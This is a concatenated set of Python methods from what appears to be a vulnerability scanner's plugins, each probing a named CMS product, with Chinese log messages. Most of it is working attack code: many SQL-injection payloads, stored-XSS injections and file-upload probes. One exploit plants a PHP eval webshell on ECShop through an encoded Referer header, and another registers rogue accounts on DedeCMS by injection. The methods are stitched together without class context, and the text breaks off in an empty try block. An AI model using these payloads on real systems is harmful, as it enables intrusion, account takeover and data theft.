def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
vul_url = arg + '/index.php?basePath=http://baidu.com/robots.txt'
# 伪造的HTTP头
httphead = {
'Host': 'www.google.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
resp = requests.get(vul_url, headers=httphead, timeout=50)
# md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.text)
# 如果成功匹配到md5('3.1416'),证明漏洞验证成功
if match:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
try:
self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
start = '2018-01-01'
end = '2018-12-31'
datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
while datestart < dateend:
datestart += datetime.timedelta(days=1)
payload = datestart.strftime('%Y_%m_%d')[2:10]
vul_url = arg + '/Data/Log/' + payload + '.log'
response = requests.get(vul_url)
if response.status_code == 200 and 'INFO:' in response.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=vul_url))
break
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
# 访问的地址
exploit = '/index.php?option=com_kunena&func=userlist&search='
# 利用union的方式(计算md5(3.1415))
payload = "%' and 1=2) union select 1, 1,md5(3.1415),1,1,1,1,1,1,1,0,0,0,1,1-- ;"
# 构造漏洞利用连接
vulurl = arg+exploit+payload
# 自定义的HTTP头
httphead = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
# 发送请求
resp = requests.get(url=vulurl, headers=httphead, timeout=50)
# 检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
resp = requests.get(self.target + payload)
re_result = re.findall(r'~~~(.*?)~~~', resp.text, re.S | re.I)
vulurl1 = "%s/?m=city.getSearch&index=xx" % self.target
payload1 = {
"key":
"xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"
}
resp1 = requests.post(vulurl1, data=payload1)
re_result1 = re.findall(r'~~~(.*?)~~~', resp1.text, re.S | re.I)
if re_result:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=self.target + payload))
if re_result1:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
target=self.target, name=self.vuln.name, url=vulurl1))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
payloads = {
'/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#',
'/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23',
'/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa',
"/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#",
"/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#"
}
for payload in payloads:
target_url = arg = arg + payload
req = requests.get(target_url)
if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=target_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payloads = [
'/api/addons/zendcheck.php',
'/api/addons/zendcheck52.php',
'/api/addons/zendcheck53.php',
'/source/plugin/mobile/api/1/index.php',
'/source/plugin/mobile/extends/module/dz_digest.php',
'/source/plugin/mobile/extends/module/dz_newpic.php',
'/source/plugin/mobile/extends/module/dz_newreply.php',
'/source/plugin/mobile/extends/module/dz_newthread.php',
]
pathinfo = re.compile(r' in <b>(.*)</b> on line')
for payload in payloads:
verify_url = self.target + payload
req = requests.get(verify_url)
match = pathinfo.findall(req.text)
if match:
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS_V5.7_
# 先注册一个帐号并登录,然后访问:
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
payload = "/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1"
url = self.target + payload
r = requests.get(url, cookies=cookies)
if 'key=' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 通过查询M3U8的文件格式, 我们可以通过文件内容指定加载的fragment的URL.
# exp.m3u8
'''
#EXTM3U
#EXT-X-TARGETDURATION:10
#EXTINF:10,
http://www.baidu.com/a.ts\")+alert(2))}catch(e){}//
'''
payload = "/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8"
url = self.target + payload
r = requests.get(url)
if r.status_code == 200 and 'alert(2)' in r.text:
if ('>17<' in r.text) or ('>32<' in r.text):
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config"
# 这里的cookie需要登录,后期cookie这里得接受外部的值
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': self.get_option('cookie')
}
data = '''id=&flag=add&device_name=%3Cscript%3Ealert%28%27cscan%27%29%3C%2Fscript%3E&api_url=&logo_url=&app_key='''
vul_url = arg + payload
# 构造执行存储xss漏洞
response = requests.post(vul_url, headers=headers, data=data)
payload2 = "/manager/api_manager.php"
vul_url2 = arg + payload2
# 验证xss漏洞是否触发
response2 = requests.get(vul_url2, headers=headers)
if response2.status_code == 200 and "<td><script>alert('cscan')</script></td>" in response2.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先注册用户,创建专题,记下专题ID。
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
payload = "/member/special.php?job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,((select concat(username,0x5c,md5(c)) from qb_members limit 0,1))),0) %23"
url = self.target + payload
r = requests.get(url, cookies=cookies)
if '4a8a08f09d37b73795649038408b5f33' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
vun_url = arg + "/library/editornew/Editor/img_save.asp"
data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert
testvul
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"
提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"
baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"
45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"
------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''
r = requests.post(vun_url, data=data)
res = r.text
match = re.search(r'getimg\(\'([\d]+.cer)\'\)', res)
if match:
verify_url = arg + \
"/library/editornew/Editor/NewImage/"+match.group(1)
rg = requests.get(verify_url)
if rg.status_code == 200 and "testvul" in rg.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞;\n在该验证过程中上传了文件地址为:{url},请及时删除。'.
format(target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的漏洞利用'.format(
target=self.target, vuln=self.vuln))
# 生成a-z命名方式的文件
randstr = chr(random.randint(96, 122))
filename_poc = randstr + '.php'
payload = "file_put_contents('{filename}','<?php eval($_POST[111]); ?>')".format(filename=filename_poc)
self.output.info("随机payload生成成功")
payload_base64 = '''{$asd'];assert(base64_decode('%s'));//}xxx''' %base64.b64encode(payload.encode('utf-8')).decode('ascii')
self.output.info("使用Base64加密payload")
payload_hex = binascii.b2a_hex(payload_base64.encode('utf-8')).decode('ascii')
self.output.info("使用十六进制加密payload")
refer = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x%s,10-- -";s:2:"id";s:3:"'/*";}''' % payload_hex
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Referer': refer
}
url_paylpad = self.target + "/user.php?act=login"
r = requests.get(url_paylpad,headers=headers)
self.output.info("正在进行漏洞利用...")
poc_url = self.target + filename_poc
post_data = {"111": "echo md5(c);"}
r2 = requests.post(poc_url, data=post_data)
if '4a8a08f09d37b73795649038408b5f33' in r2.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞,webshell地址:{webshell},密码:111'.format(
target=self.target, name=self.vuln.name, webshell=self.target + filename_poc))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# Referer : http://www.wooyun.org/bugs/wooyun-2014-080751
payloads = [
'?m=product&s=list&key=%27%20and%201=updateXml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
'?m=shop&id=&province=%27%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23',
'?m=product&s=list&ptype=0%27%20%20and%201=updatexml%281,concat%280x5c,md5%283.14%29%29,1%29%23'
]
for payload in payloads:
verify_url = self.target + payload
req = requests.get(verify_url)
if req.status_code == 200 and "4beed3b9c4a886067de0e3a094246f7" in req.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = "/extpmsPdtInfo.do?action=list"
headers = {
'Content-Length': '234',
'Content-Type': 'application/x-www-form-urlencoded',
'Referer': 'http://**.**.**.**:80/zgLoginAction.do',
'Cookie':
'JSESSIONID=A5C98CCF4A7C81CC4A3438C86412A367; rayvwulm=1',
'Host': self.target,
'Connection': 'Keep-alive',
'Accept-Encoding': 'gzip,deflate',
'User-Agent':
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21',
'Accept': '*/*'
}
data = {
'BRAND':
"&CHIP=&CONSUME_GROUP=&input=1&OS=&PDT_TYPE=&searchType=&SKSD=&value(keyword)=1'%22()%26%25<acx><ScRiPt%20>alert(“/Cscan-hyhmnn/”)</ScRiPt>&value(orderByStr)=&value(SALE_PRICE)=&value(SCREEN_SIZE)=&value(select_value)=&value(withPeomote)="
}
url = self.target + payload
response = requests.get(url, headers=headers, data=data)
if "/Cscan-hyhmnn/" in response.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 把Sverification_code改成你的验证码就哦了
verification_code = 'aaaa'
# 生成随机注册信息
randstr = 'admin_' + str(random.randint(1, 10000))
payload = '/dede/member/reg_new.php'
data = "?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwdok}&email={email}%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','*****@*****.**','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode={verification_code}&agree=".format(
userid=randstr,
uname=randstr,
userpwd=randstr,
userpwdok=randstr,
email=randstr,
verification_code=verification_code)
url = self.target + payload
r = requests.get(url)
if r.status_code == 200 and randstr in r.text and '注册成功' in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,已注册会员用户名为:{uname},密码为:{password},请及时删除!'
.format(target=self.target,
name=self.vuln.name,
uname=randstr,
passwoed=randstr))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
# 利用的payload(利用的是floor回显报错的方式)
payload = "1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
"FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
# 漏洞页面
exploit = '/index.php?option=com_timereturns&view=timereturns&id='
# 构造访问地址
vulurl = arg + exploit + payload
# 自定义的HTTP
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
# 尝试访问
resp = requests.get(url=vulurl, headers=httphead, timeout=50)
# 检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
if 'c4ca4238a0b923820dcc509a6f75849b' in resp.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
# 属于验证后台漏洞,所以需要登录并且获取cookie,详情参考对应的PDF
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# this poc need to login, so special cookie for target must be included in http headers.
cookie = ''
header = {'cookie': 'cookie'}
payload = (
"/admin.php?adminjob=apps&admintype=groups_manage&action=argument&keyword=1"
+
"&ttable=/**/tm ON t.tid=tm.tid LEFT JOIN pw_argument a ON t.tid="
+
"a.tid LEFT JOIN pw_colonys c ON a.cyid=c.id WHERE (SELECT 1 FROM (select count(*),concat"
+
"(floor(rand(0)*2),CONCAT(0x3a,(SELECT md5(233))))a from information_schema.tables group by a)b)%23"
)
verify_url = self.target + payload
req = requests.get(verify_url, headers=header)
if 'e165421110ba03099a1c0393373c5b43' in req.text:
#args['success'] = True
#args['poc_ret']['vul_url'] = verify_url
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
def getString(res):
import re
Regular = "Duplicate entry \'qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq"
Temp = re.search(Regular, res)
if Temp != None:
Temp = Temp.group(0)
return Temp
else:
return ""
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
payloads = (
'/order.php?id=-@`%27`%20UnIon%20select%20username%20from%20`%23@__admin`%20where%20(select%201%20from%20(select%20count(*)%20,concat((select%20concat(0x7167766571,0x7c,md5(123),0x3a73706c69743a,md5(123),0x7c,0x716b616771)),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@`%27`',
'/order.php?id=-%40%60%27%60%20AND%20%28SELECT%202598%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7167766571%2C%28SELECT%20MID%28%28IFNULL%28CAST%28concat(0x7c,md5(123)%2C0x3a73706c69743a%2Cmd5(123),0x7c)%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x716b616771%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29and%20id%3D%40%60%27%60'
)
for payload in payloads:
target = arg + payload
headers = {"Cookie": "shoppingcart=a,username=a"}
req = requests.get(target, headers=headers)
if req.status_code == 200 and "202cb962ac59075b964b07152d234b70" in req.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞;url={url}'.format(
target=self.target,
name=self.vuln.name,
url=target))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payload = '/FrogCMS-master/admin/?/page/edit/3'
# 首先注册用户。
# 获取cookies
cookies = {}
raw_cookies = 'current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e'
for line in raw_cookies.split(';'):
key, value = line.split('=', 1) # 1代表只分一次,得到两个数据
cookies[key] = value
#print (cookies)
data = 'page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close'
url = self.target + payload
requests.post(url, cookies=cookies, data=data)
verify_url = self.target + '/FrogCMS-master/?about_us'
r = requests.get(verify_url)
if "<script>confirm(1234)</script>" in r.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url = self.target
url = url if url[-1] != '/' else url[:-1]
payload = (
"/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20"
"AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||"
"CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN"
"%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)"
"||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA"
)
verify_url = url + payload
req = requests.get(verify_url)
content = req.text
if req.status_code == 500 and 'qczgq1qnoiq' in content:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 先注册一个帐号并登录,然后访问:
# 获取cookies
cookies = {}
'''
raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
for line in raw_cookies.split(';'):
key,value=line.split('=',1)#1代表只分一次,得到两个数据
cookies[key]=value
'''
payload = "/admin.php?c=syscontroller&m=add&post=1"
data = "data%5Bname%5D=myndtt*/phpinfo();/*&data%5Bcname%5D=myndtt&app=0&data%5Btype%5D%5B%5D=0&data%5Bmeta_title%5D=1234&data%5Bmeta_keywords%5D=123&data%5Bmeta_descrintion%5D=123"
url = self.target + payload
requests.post(url, cookies=cookies, data=data)
verify_url = self.target + '/index.php?c=myndtt&m=index'
r = requests.get(verify_url)
if 'PHP Version' in r.text and 'System' in r.text:
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
payloads = [
"/DPMA/FWeb/SPEWeb/Web5/SPEPhotosDetail.aspx?KindSetID=20010&ALBUMID=2011+and+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--",
"/DPMA/FWeb/WorkRoomWeb/Web/TeacherPhotosDetail.aspx?TID=3050010135+AND+1=sys.fn_varbintohexstr(hashbytes('MD5','1234'))--&Album_ID=1075"
]
for payload in payloads:
verify_url = self.target + payload
#code, head, res, errcode, _ = curl.curl2(url)
r = requests.get(verify_url)
if '81dc9bdb52d04dc20036dbd8313ed055' in r.text:
# security_hole(verity_url)
self.output.report(
self.vuln, '发现{target}存在{name}漏洞,漏洞地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# __Refer___ = http://www.wooyun.org/bugs/wooyun-2015-0121337
payloads = [
'/VideoDetail.aspx?Guid=111%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
'/VideoSearchList.aspx?VideoCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--',
'/ProductListCategory.aspx?ProductCategoryID=1%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))%3E0--',
'/ArticleDetail.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
'/ArticleDetailNew.aspx?guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--',
'/HelpList.aspx?Guid=1%27%20and%20(db_name()%2BCHAR(126)%2BCHAR(116)%2BCHAR(101)%2BCHAR(115)%2BCHAR(116)%2BCHAR(118)%2BCHAR(117)%2BCHAR(108))>0--'
]
for payload in payloads:
verify_url = self.target + payload
req = requests.get(verify_url)
if req.status_code == 200 and "~testvul" in req.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
